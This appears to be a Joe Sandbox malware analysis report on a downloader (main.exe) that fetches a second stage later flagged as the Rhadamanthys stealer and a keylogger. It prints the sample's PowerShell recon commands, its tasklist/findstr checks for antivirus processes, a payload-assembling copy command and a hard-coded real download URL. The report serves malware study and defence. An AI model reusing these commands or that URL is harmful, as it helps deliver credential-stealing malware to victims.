2024-12-19 08:29:24 UTC	16384	IN	Data Raw: 63 52 59 66 56 67 51 72 6a 30 58 37 61 73 79 44 7a 39 58 59 6e 79 58 43 79 4c 34 36 36 6a 76 6d 76 39 4f 6c 5a 52 30 73 69 2f 6f 36 6f 72 37 32 43 6e 4e 6a 41 71 76 4c 31 64 43 30 75 48 2f 75 50 72 33 68 41 39 62 65 50 45 64 6b 44 39 35 58 6d 41 4d 54 34 74 30 41 6f 7a 4a 55 6b 72 4c 68 6d 35 50 52 61 4c 44 34 2b 4b 43 74 51 62 63 5a 57 70 72 69 31 44 51 37 6e 47 30 72 74 42 48 4f 75 58 30 51 7a 32 6a 2f 5a 6d 64 77 69 67 74 42 63 6c 73 58 66 68 68 35 50 76 65 41 74 38 37 59 4d 71 6a 5a 45 2f 49 7a 73 4c 38 35 77 62 37 56 45 33 4a 38 36 45 45 4e 64 62 51 69 64 35 55 59 62 38 63 52 2b 51 71 37 76 64 4a 45 45 55 61 6b 65 6a 65 4d 63 47 4b 39 36 49 75 5a 72 4c 69 64 49 39 45 6c 65 58 6d 55 67 36 57 34 33 58 41 66 39 32 64 48 76 59 6d 47 4d 34 69 48 50 41 66 Data Ascii: cRYfVgQrj0X7asyDz9XYnyXCyL466jvmv9OlZR0si/o6or72CnNjAqvL1dC0uH/uPr3hA9bePEdkD95XmAMT4t0AozJUkrLhm5PRaLD4+KCtQbcZWpri1DQ7nG0rtBHOuX0Qz2j/ZmdwigtBclsXfhh5PveAt87YMqjZE/IzsL85wb7VE3J86EENdbQid5UYb8cR+Qq7vdJEEUakejeMcGK96IuZrLidI9EleXmUg6W43XAf92dHvYmGM4iHPAf
2024-12-19 08:29:24 UTC	16384	IN	Data Raw: 42 53 6b 43 78 6c 72 73 34 31 41 44 66 7a 33 6d 78 42 4a 75 6b 34 34 4a 51 2f 4a 33 69 59 71 68 2b 4f 65 70 4c 4e 64 51 71 31 51 73 7a 67 79 74 53 33 47 38 4c 71 73 6f 44 63 4f 78 42 42 5a 52 63 30 67 50 62 44 33 47 68 41 48 6f 49 67 50 70 4a 78 4c 36 76 4c 67 7a 6f 57 75 73 68 50 4b 6e 6e 71 4f 4d 6a 4f 33 33 7a 45 71 6c 4b 77 4c 41 6c 61 51 5a 75 62 75 35 35 2f 57 6f 50 65 2f 59 79 4d 6b 79 69 6c 69 72 6e 43 42 4b 2b 35 63 44 59 47 71 75 79 32 7a 37 41 38 6a 62 6c 44 4c 7a 73 54 2b 49 6e 70 70 42 4a 61 62 50 5a 68 67 54 4a 32 51 64 6c 4d 31 67 66 6b 64 4f 6d 72 66 41 73 4e 58 61 6f 79 6e 52 2b 61 6e 6d 47 33 38 51 31 68 77 4d 5a 5a 7a 42 4b 6c 66 4d 62 6d 5a 43 64 66 41 53 38 35 70 30 53 6f 6b 48 6d 73 33 62 6f 74 47 63 71 71 6e 36 38 68 74 51 6b 74 42 Data Ascii: BSkCxlrs41ADfz3mxBJuk44JQ/J3iYqh+OepLNdQq1QszgytS3G8LqsoDcOxBBZRc0gPbD3GhAHoIgPpJxL6vLgzoWushPKnnqOMjO33zEqlKwLAlaQZubu55/WoPe/YyMkyilirnCBK+5cDYGquy2z7A8jblDLzsT+InppBJabPZhgTJ2QdlM1gfkdOmrfAsNXaoynR+anmG38Q1hwMZZzBKlfMbmZCdfAS85p0SokHms3botGcqqn68htQktB

Target ID:	0
Start time:	03:29:11
Start date:	19/12/2024
Path:	C:\Users\user\Desktop\main.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\Desktop\main.exe"
Imagebase:	0x7ff7fe8f0000
File size:	2'857'365 bytes
MD5 hash:	014C8105B6501591916DAFEE9A3344C6
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	1
Start time:	03:29:11
Start date:	19/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	03:29:11
Start date:	19/12/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	powershell.exe -Command "(Get-CimInstance Win32_Processor).Name"
Imagebase:	0x7ff7be880000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	03:29:11
Start date:	19/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	03:29:14
Start date:	19/12/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	powershell.exe -Command "(Get-CimInstance Win32_VideoController).Name"
Imagebase:	0x7ff7be880000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	03:29:14
Start date:	19/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	03:29:16
Start date:	19/12/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	powershell.exe -Command "try { $avProducts = Get-CimInstance -Namespace 'root/SecurityCenter2' -Class AntiVirusProduct \| Select-Object -ExpandProperty displayName; if ($avProducts) { $avProducts } else { 'No antivirus software detected' } } catch { 'Error detecting antivirus software' }"
Imagebase:	0x7ff7be880000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	03:29:16
Start date:	19/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	9
Start time:	03:29:26
Start date:	19/12/2024
Path:	C:\Users\user\AppData\Local\Temp\downloaded_exe.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\downloaded_exe.exe"
Imagebase:	0x400000
File size:	1'301'562 bytes
MD5 hash:	22AEFDCE6474D0687748AB51F3DDE0D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 25%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	11
Start time:	03:29:28
Start date:	19/12/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\cmd.exe" /c copy Estimates Estimates.cmd & Estimates.cmd
Imagebase:	0x790000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	12
Start time:	03:29:28
Start date:	19/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	13
Start time:	03:29:29
Start date:	19/12/2024
Path:	C:\Windows\SysWOW64\tasklist.exe
Wow64 process (32bit):	true
Commandline:	tasklist
Imagebase:	0x6c0000
File size:	79'360 bytes
MD5 hash:	0A4448B31CE7F83CB7691A2657F330F1
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	14
Start time:	03:29:29
Start date:	19/12/2024
Path:	C:\Windows\SysWOW64\findstr.exe
Wow64 process (32bit):	true
Commandline:	findstr /I "opssvc wrsa"
Imagebase:	0x590000
File size:	29'696 bytes
MD5 hash:	F1D4BE0E99EC734376FDE474A8D4EA3E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	15
Start time:	03:29:30
Start date:	19/12/2024
Path:	C:\Windows\SysWOW64\tasklist.exe
Wow64 process (32bit):	true
Commandline:	tasklist
Imagebase:	0x6c0000
File size:	79'360 bytes
MD5 hash:	0A4448B31CE7F83CB7691A2657F330F1
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	16
Start time:	03:29:31
Start date:	19/12/2024
Path:	C:\Windows\SysWOW64\findstr.exe
Wow64 process (32bit):	true
Commandline:	findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"
Imagebase:	0x590000
File size:	29'696 bytes
MD5 hash:	F1D4BE0E99EC734376FDE474A8D4EA3E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	17
Start time:	03:29:31
Start date:	19/12/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	cmd /c md 542181
Imagebase:	0x790000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	18
Start time:	03:29:32
Start date:	19/12/2024
Path:	C:\Windows\SysWOW64\findstr.exe
Wow64 process (32bit):	true
Commandline:	findstr /V "exports" Fleece
Imagebase:	0x590000
File size:	29'696 bytes
MD5 hash:	F1D4BE0E99EC734376FDE474A8D4EA3E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	19
Start time:	03:29:32
Start date:	19/12/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	cmd /c copy /b ..\Stewart + ..\Universe + ..\Ferry + ..\Namely + ..\Catholic + ..\Understanding + ..\Invalid + ..\Del + ..\Premier b
Imagebase:	0x790000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	20
Start time:	03:29:32
Start date:	19/12/2024
Path:	C:\Users\user\AppData\Local\Temp\542181\Flux.com
Wow64 process (32bit):	true
Commandline:	Flux.com b
Imagebase:	0xd10000
File size:	947'288 bytes
MD5 hash:	62D09F076E6E0240548C2F837536A46A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 0%, ReversingLabs
Has exited:	true

Show Windows behavior

Target ID:	21
Start time:	03:29:32
Start date:	19/12/2024
Path:	C:\Windows\SysWOW64\choice.exe
Wow64 process (32bit):	true
Commandline:	choice /d y /t 5
Imagebase:	0xfe0000
File size:	28'160 bytes
MD5 hash:	FCE0E41C87DC4ABBE976998AD26C27E4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	23
Start time:	03:29:52
Start date:	19/12/2024
Path:	C:\Windows\SysWOW64\svchost.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\svchost.exe"
Imagebase:	0x4d0000
File size:	46'504 bytes
MD5 hash:	1ED18311E3DA35942DB37D15FA40CC5B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_RHADAMANTHYS, Description: Yara detected RHADAMANTHYS Stealer, Source: 00000017.00000003.2575544799.0000000002C40000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000017.00000003.2579589232.0000000004BF0000.00000004.00000001.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000017.00000003.2579847593.0000000004E10000.00000004.00000001.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_RHADAMANTHYS, Description: Yara detected RHADAMANTHYS Stealer, Source: 00000017.00000002.2663941815.0000000002C50000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
Has exited:	true

Show Windows behavior

Target ID:	26
Start time:	03:29:53
Start date:	19/12/2024
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 8048 -s 968
Imagebase:	0xe30000
File size:	483'680 bytes
MD5 hash:	C31336C1EFC2CCB44B4326EA793040F2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	27
Start time:	03:30:01
Start date:	19/12/2024
Path:	C:\Windows\System32\fontdrvhost.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\fontdrvhost.exe"
Imagebase:	0x7ff7b5950000
File size:	827'408 bytes
MD5 hash:	BBCB897697B3442657C7D6E3EDDBD25F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	29
Start time:	03:30:04
Start date:	19/12/2024
Path:	C:\Windows\System32\WerFault.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\WerFault.exe -u -p 7064 -s 140
Imagebase:	0x7ff741010000
File size:	570'736 bytes
MD5 hash:	FD27D9F6D02763BDE32511B5DF7FF7A0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	1.1%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	16.9%
Total number of Nodes:	402
Total number of Limit Nodes:	16

Executed Functions

Function 00007FF7FE8F11B0 Relevance: 10.6, APIs: 7, Instructions: 142
sleepstringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNEL32(?,?,?,00007FF7FE8F1426), ref: 00007FF7FE8F11EE
SetUnhandledExceptionFilter.KERNEL32 ref: 00007FF7FE8F125B
malloc.MSVCRT ref: 00007FF7FE8F128F
strlen.MSVCRT ref: 00007FF7FE8F12B4
malloc.MSVCRT ref: 00007FF7FE8F12C0
memcpy.MSVCRT ref: 00007FF7FE8F12D8

Memory Dump Source

Source File: 00000000.00000002.2314406573.00007FF7FE8F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7FE8F0000, based on PE: true

Associated: 00000000.00000002.2314370363.00007FF7FE8F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314540478.00007FF7FE9BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314571999.00007FF7FE9BF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314627173.00007FF7FE9ED000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314648387.00007FF7FE9EF000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314669899.00007FF7FE9F2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7fe8f0000_main.jbxd

Similarity

API ID: malloc$ExceptionFilterSleepUnhandledmemcpystrlen
String ID:
API String ID: 3806033187-0
Opcode ID: bb85477d5f23404a2d3496622b61e0c016ad5e565ab4c1d359895825bff9ebd5
Instruction ID: 0045a1d6a178da1173d340767f13b8527d29f3be293a78e57a6525b26a38a060
Opcode Fuzzy Hash: bb85477d5f23404a2d3496622b61e0c016ad5e565ab4c1d359895825bff9ebd5
Instruction Fuzzy Hash: 6E514932A1968385F710FB65E840279B6A1AFD5B90FC46432DA3C473D2DE6CE85187F2

Function 00007FF7FE8F1460 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 116
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

InternetOpenA.WININET ref: 00007FF7FE8F14AF
InternetOpenUrlA.WININET ref: 00007FF7FE8F1546

Strings

EXEFetcher, xrefs: 00007FF7FE8F149E

Memory Dump Source

Source File: 00000000.00000002.2314406573.00007FF7FE8F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7FE8F0000, based on PE: true

Associated: 00000000.00000002.2314370363.00007FF7FE8F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314540478.00007FF7FE9BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314571999.00007FF7FE9BF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314627173.00007FF7FE9ED000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314648387.00007FF7FE9EF000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314669899.00007FF7FE9F2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7fe8f0000_main.jbxd

Similarity

API ID: InternetOpen
String ID: EXEFetcher
API String ID: 2038078732-2307415639
Opcode ID: 6798b67eeb5773710cff07bb862f49ca73e1d5133d6b2908caab51b97f9da2cb
Instruction ID: 92c0d997a325a19f6bf6aa39d6d31eb044024c9e9b7e96b29a7fbea7222c0f12
Opcode Fuzzy Hash: 6798b67eeb5773710cff07bb862f49ca73e1d5133d6b2908caab51b97f9da2cb
Instruction Fuzzy Hash: 92513625B1578688EB30EF65DC543E863A5FB88788F804036DD6D4B7AADF6CD204C361

Function 00007FF7FE8F16C5 Relevance: .1, Instructions: 78COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2314406573.00007FF7FE8F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7FE8F0000, based on PE: true

Associated: 00000000.00000002.2314370363.00007FF7FE8F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314540478.00007FF7FE9BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314571999.00007FF7FE9BF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314627173.00007FF7FE9ED000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314648387.00007FF7FE9EF000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314669899.00007FF7FE9F2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7fe8f0000_main.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 78457a94bcc44409a96441f0e42b2e0a975417938a5ffd6a7178e973057af4a5
Instruction ID: c9288b388f4dd1740ad51bc9cc3f99768e2b0e2f607be4ad67f1dfa290f7c09a
Opcode Fuzzy Hash: 78457a94bcc44409a96441f0e42b2e0a975417938a5ffd6a7178e973057af4a5
Instruction Fuzzy Hash: A2314126B15B4589EF10EB61E8503ED63A4BB89B8CF800135EE9D17B99EF3CD14483A0

Function 00007FF7FE90CC20 Relevance: 28.1, APIs: 13, Strings: 3, Instructions: 113
threadlibraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentThreadId.KERNEL32 ref: 00007FF7FE90CC40
CreateEventA.KERNEL32 ref: 00007FF7FE90CC56
GetCurrentProcess.KERNEL32(?,?,?,?,?,00000000,?,00007FF7FE9ED210,00000000), ref: 00007FF7FE90CC9B
GetCurrentThread.KERNEL32 ref: 00007FF7FE90CCA0
GetCurrentProcess.KERNEL32(?,?,?,?,?,00000000,?,00007FF7FE9ED210,00000000), ref: 00007FF7FE90CCA9
DuplicateHandle.KERNEL32 ref: 00007FF7FE90CCD0
GetThreadPriority.KERNEL32 ref: 00007FF7FE90CCE2
TlsSetValue.KERNEL32 ref: 00007FF7FE90CD0E
TlsGetValue.KERNEL32 ref: 00007FF7FE90CD3F
abort.MSVCRT(?,?,00007FF7FE9ED210,00000000,00007FF7FE90DC19,?,?,?,?,00007FF7FE91019F), ref: 00007FF7FE9BBEBC
GetModuleHandleA.KERNEL32 ref: 00007FF7FE9BBF0D
GetProcAddress.KERNEL32(?,?,?,?,?,?,?,?,00000000,00007FF7FE90DC19,?,?,?,?,00007FF7FE91019F), ref: 00007FF7FE9BBF2C
GetProcAddress.KERNEL32(?,?,?,?,?,?,?,?,00000000,00007FF7FE90DC19,?,?,?,?,00007FF7FE91019F), ref: 00007FF7FE9BBF3F

Strings

AddVectoredExceptionHandler, xrefs: 00007FF7FE9BBF22
kernel32.dll, xrefs: 00007FF7FE9BBF06
RemoveVectoredExceptionHandler, xrefs: 00007FF7FE9BBF2E

Memory Dump Source

Source File: 00000000.00000002.2314406573.00007FF7FE8F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7FE8F0000, based on PE: true

Associated: 00000000.00000002.2314370363.00007FF7FE8F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314540478.00007FF7FE9BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314571999.00007FF7FE9BF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314627173.00007FF7FE9ED000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314648387.00007FF7FE9EF000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314669899.00007FF7FE9F2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7fe8f0000_main.jbxd

Similarity

API ID: Current$Thread$AddressHandleProcProcessValue$CreateDuplicateEventModulePriorityabort
String ID: AddVectoredExceptionHandler$RemoveVectoredExceptionHandler$kernel32.dll
API String ID: 1214264455-3889795909
Opcode ID: 67dccf013b10c5b265b52631339e5669e9e5904f7b98782ec9404d529c0f0c8a
Instruction ID: b86ca8e8dc80663fca25fd91d355cd9d1e2e87431db5e35dc63b0ce4b9f6ad37
Opcode Fuzzy Hash: 67dccf013b10c5b265b52631339e5669e9e5904f7b98782ec9404d529c0f0c8a
Instruction Fuzzy Hash: 1E413E31A0970286EB10EF35A845369B7A0BF85BA4F840235DA6D473E4EF7CE445C7B2

Function 00007FF7FE90D510 Relevance: 21.1, APIs: 7, Strings: 5, Instructions: 139
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00007FF7FE90C4E0: calloc.MSVCRT ref: 00007FF7FE90C587

TlsGetValue.KERNEL32(?,?,?,?,00007FF7FE9ED210,downloaded_exe.exe,?,?,00007FF7FE9A3F45,000000CC,?,00007FF7FE9ED210,downloaded_exe.exe,00007FF7FE9B09DB), ref: 00007FF7FE90D5BB
TlsGetValue.KERNEL32(?,?,?,?,00007FF7FE9ED210,downloaded_exe.exe,?,?,00007FF7FE9A3F45,000000CC,?,00007FF7FE9ED210,downloaded_exe.exe,00007FF7FE9B09DB), ref: 00007FF7FE90D5E0
TlsGetValue.KERNEL32(?,?,?,?,00007FF7FE9ED210,downloaded_exe.exe,?,?,00007FF7FE9A3F45,000000CC,?,00007FF7FE9ED210,downloaded_exe.exe,00007FF7FE9B09DB), ref: 00007FF7FE90D607
fprintf.MSVCRT ref: 00007FF7FE90D653

Strings

once %p is %ld, xrefs: 00007FF7FE90D649
AddVectoredExceptionHandler, xrefs: 00007FF7FE9BBF22
kernel32.dll, xrefs: 00007FF7FE9BBF06
downloaded_exe.exe, xrefs: 00007FF7FE90D514
RemoveVectoredExceptionHandler, xrefs: 00007FF7FE9BBF2E

Memory Dump Source

Source File: 00000000.00000002.2314406573.00007FF7FE8F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7FE8F0000, based on PE: true

Associated: 00000000.00000002.2314370363.00007FF7FE8F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314540478.00007FF7FE9BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314571999.00007FF7FE9BF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314627173.00007FF7FE9ED000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314648387.00007FF7FE9EF000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314669899.00007FF7FE9F2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7fe8f0000_main.jbxd

Similarity

API ID: Value$callocfprintf
String ID: once %p is %ld$AddVectoredExceptionHandler$RemoveVectoredExceptionHandler$downloaded_exe.exe$kernel32.dll
API String ID: 811747394-1396716580
Opcode ID: 475d4f9c32a6d0efe54e0d590ef4897c345dd9206c82898b5762ae2cec637c37
Instruction ID: 1c40e6f8b0ad199643095d087f5adc1f6c3765076d6f6b32b5200d54ad82f54c
Opcode Fuzzy Hash: 475d4f9c32a6d0efe54e0d590ef4897c345dd9206c82898b5762ae2cec637c37
Instruction Fuzzy Hash: 26512862A0970686EB54FB25B8413BDA3A4AFC9784FC45435DE6D033E5EE2CE54087B3

Function 00007FF7FE8F18F4 Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 228
processpipeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreatePipe.KERNEL32 ref: 00007FF7FE8F1970
CreateProcessA.KERNEL32 ref: 00007FF7FE8F1A9D

Strings

powershell.exe -Command , xrefs: 00007FF7FE8F1A2A

Memory Dump Source

Source File: 00000000.00000002.2314406573.00007FF7FE8F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7FE8F0000, based on PE: true

Associated: 00000000.00000002.2314370363.00007FF7FE8F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314540478.00007FF7FE9BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314571999.00007FF7FE9BF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314627173.00007FF7FE9ED000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314648387.00007FF7FE9EF000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314669899.00007FF7FE9F2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7fe8f0000_main.jbxd

Similarity

API ID: Create$PipeProcess
String ID: powershell.exe -Command
API String ID: 759506453-4221202778
Opcode ID: 8f8084a89d10dacb5b904433bbf82112edf0292c32eef850c9d0795c34bf9f99
Instruction ID: b24dbfe09051b8e45a106cfb82ccf2f80cc508c16a2e620514bf4581078baf7e
Opcode Fuzzy Hash: 8f8084a89d10dacb5b904433bbf82112edf0292c32eef850c9d0795c34bf9f99
Instruction Fuzzy Hash: 67B13475A147C298DF34EF65D8503E963A4EB89BC8F800136DA9D0B799EF68C344C3A1

Function 00007FF7FE8F2048 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 111
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

downloaded_exe.exe, xrefs: 00007FF7FE8F2160
open, xrefs: 00007FF7FE8F21D5
https://ebitm.co.uk/salah/wp-includes/assets/ping.php, xrefs: 00007FF7FE8F208E

Memory Dump Source

Source File: 00000000.00000002.2314406573.00007FF7FE8F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7FE8F0000, based on PE: true

Associated: 00000000.00000002.2314370363.00007FF7FE8F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314540478.00007FF7FE9BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314571999.00007FF7FE9BF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314627173.00007FF7FE9ED000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314648387.00007FF7FE9EF000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314669899.00007FF7FE9F2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

